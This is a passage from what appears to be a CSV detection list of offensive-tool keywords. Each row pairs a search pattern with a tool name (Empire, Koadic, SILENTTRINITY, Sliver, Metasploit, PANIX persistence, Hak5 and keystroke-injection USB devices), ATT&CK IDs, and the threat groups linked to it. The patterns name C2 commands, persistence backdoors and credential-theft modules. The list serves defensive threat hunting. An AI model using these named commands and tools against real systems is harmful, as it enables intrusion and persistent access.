"*URL must be provided for PNG embedding!*",".{0,1000}URL\smust\sbe\sprovided\sfor\sPNG\sembedding!.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","N/A","10","6","534","62","2025-03-10T07:32:22Z","2024-01-10T08:04:57Z","61961"
"*url: 'forwarding_link/post.php',*",".{0,1000}url\:\s\'forwarding_link\/post\.php\',.{0,1000}","offensive_tool_keyword","saycheese","Grab target's webcam shots by link","T1213 - T1071 - T1102 - T1123 - T1185 - T1200","TA0001 - TA0005 - TA0009 - TA0011","N/A","N/A","Phishing","https://github.com/hangetzzu/saycheese","1","0","N/A","N/A","9","10","1175","962","2024-06-18T23:39:41Z","2019-04-29T04:07:00Z","61962"
"*ursnif_IcedID.profile*",".{0,1000}ursnif_IcedID\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","61963"
"*us.mirrors.cicku.me/blackarch/*/os/*",".{0,1000}us\.mirrors\.cicku\.me\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","61964"
"*usage_backdoor_user*",".{0,1000}usage_backdoor_user.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","61965"
"*usage_initd_backdoor*",".{0,1000}usage_initd_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","61966"
"*usage_malicious_docker_container*",".{0,1000}usage_malicious_docker_container.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","61967"
"*usage_malicious_package*",".{0,1000}usage_malicious_package.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","61968"
"*usage_motd_backdoor*",".{0,1000}usage_motd_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","61969"
"*usage_package_manager_persistence*",".{0,1000}usage_package_manager_persistence.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","61970"
"*usage_rc_local_backdoor*",".{0,1000}usage_rc_local_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","61971"
"*usage_sudoers_backdoor*",".{0,1000}usage_sudoers_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","61972"
"*usage_suid_backdoor*",".{0,1000}usage_suid_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","61973"
"*usage_system_binary_backdoor*",".{0,1000}usage_system_binary_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","61974"
"*USB\VID_0B95&PID_772A\90CEA2*",".{0,1000}USB\\VID_0B95&PID_772A\\90CEA2.{0,1000}","offensive_tool_keyword","Hak5 Wifi Pineapple","rogue access point suite for advanced man-in-the-middle attacks","T1071 - T1078 - T1200","TA0001 - TA0009 - TA0006","N/A","N/A","Hardware","https://github.com/mthcht/awesome-lists/blob/main/Lists/suspicious_usb_ids_list.csv","1","0","#deviceid","can appear in windows eventid 6416","10","10","936","111","2025-04-22T21:16:31Z","2022-12-11T10:45:11Z","61975"
"*USB\VID_0BDA&PID_8152\00E04C361BDE*",".{0,1000}USB\\VID_0BDA&PID_8152\\00E04C361BDE.{0,1000}","offensive_tool_keyword","Hak5 Lan turtle","ethernet extension device providing remote Access and MITM capabilities","T1071 - T1090 - T1040","TA0005 - TA0009 - TA0003","N/A","N/A","Hardware","https://github.com/mthcht/awesome-lists/blob/main/Lists/suspicious_usb_ids_list.csv","1","0","#deviceid","can appear in windows eventid 6416","10","10","936","111","2025-04-22T21:16:31Z","2022-12-11T10:45:11Z","61976"
"*USB\VID_0BDA&PID_8152\00E04C3659E9*",".{0,1000}USB\\VID_0BDA&PID_8152\\00E04C3659E9.{0,1000}","offensive_tool_keyword","Hak5 Lan turtle","ethernet extension device providing remote Access and MITM capabilities","T1071 - T1090 - T1040","TA0005 - TA0009 - TA0003","N/A","N/A","Hardware","https://github.com/mthcht/awesome-lists/blob/main/Lists/suspicious_usb_ids_list.csv","1","0","#deviceid","can appear in windows eventid 6416","10","10","936","111","2025-04-22T21:16:31Z","2022-12-11T10:45:11Z","61977"
"*USB\VID_10C4\&PID_EA60*",".{0,1000}USB\\VID_10C4\\&PID_EA60.{0,1000}","offensive_tool_keyword","Hak5 O.MG Cable","USB cable with an advanced implant hidden inside","T1056 - T1090","TA0005 - TA0009","N/A","N/A","Hardware","https://github.com/mthcht/awesome-lists/blob/main/Lists/suspicious_usb_ids_list.csv","1","0","#deviceid","can appear in windows eventid 6416","10","10","936","111","2025-04-22T21:16:31Z","2022-12-11T10:45:11Z","61978"
"*USB\VID_16D0&PID_0753*",".{0,1000}USB\\VID_16D0&PID_0753.{0,1000}","offensive_tool_keyword","Digispark Attiny85","keystroke injection tool","T1056 - T1204","TA0001 - TA0009","N/A","N/A","Hardware","https://github.com/mthcht/awesome-lists/blob/main/Lists/suspicious_usb_ids_list.csv","1","0","#deviceid","can appear in windows eventid 6416","10","10","936","111","2025-04-22T21:16:31Z","2022-12-11T10:45:11Z","61979"
"*USB\VID_18D1&PID_4EE7\KYLIN*",".{0,1000}USB\\VID_18D1&PID_4EE7\\KYLIN.{0,1000}","offensive_tool_keyword","Hak5 Screen Crab","stealthy video man-in-the-middle HDMI implant","T1071 - T1123 - T1560","TA0005 - TA0010 - TA0009","N/A","N/A","Hardware","https://github.com/mthcht/awesome-lists/blob/main/Lists/suspicious_usb_ids_list.csv","1","0","#deviceid","can appear in windows eventid 6416","10","10","936","111","2025-04-22T21:16:31Z","2022-12-11T10:45:11Z","61980"
"*USB\VID_1915&PID_520C&MI_00\6&20A3E423*",".{0,1000}USB\\VID_1915&PID_520C&MI_00\\6&20A3E423.{0,1000}","offensive_tool_keyword","Nordic NRF52840","Logitech Unifying impersonator - used for keystroke injections","T1056 - T1078","TA0001 - TA0002","N/A","N/A","Hardware","https://github.com/mthcht/awesome-lists/blob/main/Lists/suspicious_usb_ids_list.csv","1","0","#deviceid","can appear in windows eventid 6416","10","10","936","111","2025-04-22T21:16:31Z","2022-12-11T10:45:11Z","61981"
"*USB\VID_1B4F&PID_9208*",".{0,1000}USB\\VID_1B4F&PID_9208.{0,1000}","offensive_tool_keyword","Cactus WHID","advanced keystroke injection device","T1056 - T1204","TA0001 - TA0009","N/A","N/A","Hardware","https://github.com/mthcht/awesome-lists/blob/main/Lists/suspicious_usb_ids_list.csv","1","0","#deviceid","can appear in windows eventid 6416","10","10","936","111","2025-04-22T21:16:31Z","2022-12-11T10:45:11Z","61982"
"*USB\VID_2341&PID_8037*",".{0,1000}USB\\VID_2341&PID_8037.{0,1000}","offensive_tool_keyword","Arduino Pro Micro","keystroke injection tool","T1056 - T1204","TA0001 - TA0009","N/A","N/A","Hardware","https://github.com/mthcht/awesome-lists/blob/main/Lists/suspicious_usb_ids_list.csv","1","0","#deviceid","can appear in windows eventid 6416","10","10","936","111","2025-04-22T21:16:31Z","2022-12-11T10:45:11Z","61983"
"*USBPcap*",".{0,1000}USBPcap.{0,1000}","offensive_tool_keyword","usbpcap","USB capture for Windows.","T1115 - T1129 - T1052","TA0003 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/s-h-3-l-l/katoolin3","1","0","N/A","N/A","N/A","4","370","120","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z","61984"
"*use command/file_basic_upload.json*",".{0,1000}use\scommand\/file_basic_upload\.json.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","61985"
"*use exploit/*",".{0,1000}use\sexploit\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","61986"
"*use exploit/windows/*",".{0,1000}use\sexploit\/windows\/.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","61987"
"*use implant/*",".{0,1000}use\simplant\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","61988"
"*use incognito*",".{0,1000}use\sincognito.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","61989"
"*use interactive/command_prompt.json*",".{0,1000}use\sinteractive\/command_prompt\.json.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","61990"
"*Use nmap --script http-ntlm-info *",".{0,1000}Use\snmap\s\-\-script\shttp\-ntlm\-info\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","61993"
"*use powershell_stageless*",".{0,1000}use\spowershell_stageless.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","61994"
"*use safetykatz*",".{0,1000}use\ssafetykatz.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","61995"
"*use scanner/smb/smb_enum_gpp*",".{0,1000}use\sscanner\/smb\/smb_enum_gpp.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","61996"
"*use scanner/ssh/ssh_enumusers*",".{0,1000}use\sscanner\/ssh\/ssh_enumusers.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#linux","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","61997"
"*use stager/*",".{0,1000}use\sstager\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","61998"
"*UseBeaconCmd*",".{0,1000}UseBeaconCmd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","62001"
"*uselistener dbx*",".{0,1000}uselistener\sdbx.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","62002"
"*uselistener onedrive*",".{0,1000}uselistener\sonedrive.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","62003"
"*usemodule operation/file/put_file*",".{0,1000}usemodule\soperation\/file\/put_file.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","62004"
"*usemodule persistence/*",".{0,1000}usemodule\spersistence\/.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","62005"
"*usemodule powershell/persistence*",".{0,1000}usemodule\spowershell\/persistence.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - 